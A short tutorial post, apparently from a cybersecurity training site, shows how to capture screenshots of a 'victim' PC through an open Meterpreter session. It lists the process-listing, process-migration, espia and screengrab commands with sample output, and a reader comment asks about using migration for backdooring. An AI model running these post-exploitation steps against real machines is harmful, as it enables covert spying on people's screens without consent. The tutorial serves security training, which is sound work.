How to Get Screen Captures Using Metasploit and Meterpreter

July 14, 2015 | Views: 4579

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hi Again,

Today, using metasploit and meterpreter, I will tell you how to screen capture a victim’s PC / applications.

What we need is metasploit and meterpreter configured and opened. This step starts when we have any meterpreter session opened. Every time, after going to CMD, we have Meterpreter Session opened, don’t get confused.

Just type:

meterpreter > ps

To have a full list of processes running, it will show the processes running list, like this:

Process list

    PID   Name                 Path
    ---   ----                 ----
    180   Explorer.exe          C:WINDOWSsystem32explorer.exe
    248   snmp.exe              C:WINDOWSSystem32snmp.exe
    260   notepad.EXE           C:WINDOWSNotepad.EXE
    284   jing.exe              c:surgemailjing.exe
    332   VMwareService.exe     C:Program FilesVMwareVMware ToolsVMwareService.exe
    612   VMwareTray.exe        C:Program FilesVMwareVMware ToolsVMwareTray.exe
    620   VMwareUser.exe        C:Program FilesVMwareVMware ToolsVMwareUser.exe

We can now select any task and have a screen capture of it. All you need is:

For selecting

		meterpreter > migrate 260
		[*] Migrating to 260...
		[*] Migration completed successfully.

Using espia

		meterpreter > use espia
		Loading extension espia...success.

Now to grab screen shots

		meterpreter > screengrab
		Screenshot saved to: /root/sWfSCD.jpeg


Voila! And now, you’ve done this, too!

–Multi Thinker

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Would be best to mention more clearly that as part of this you first need to exploit the target.

  2. so you need to connect to the victim’s PC first to capture his’her processes right?

  3. nice ^_^ tnx for this but we can also use the migrate for backdooring ?? ^_^

  4. Gave it a good rating would have done excellent but would love to see a better explanation how why you run those command and maybe a brief description of each of them, so as the person running them I understand what I am doing not just typing in commands cause someone else said so. Great job though.

  5. Complex for beginners to understand this 🙁

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?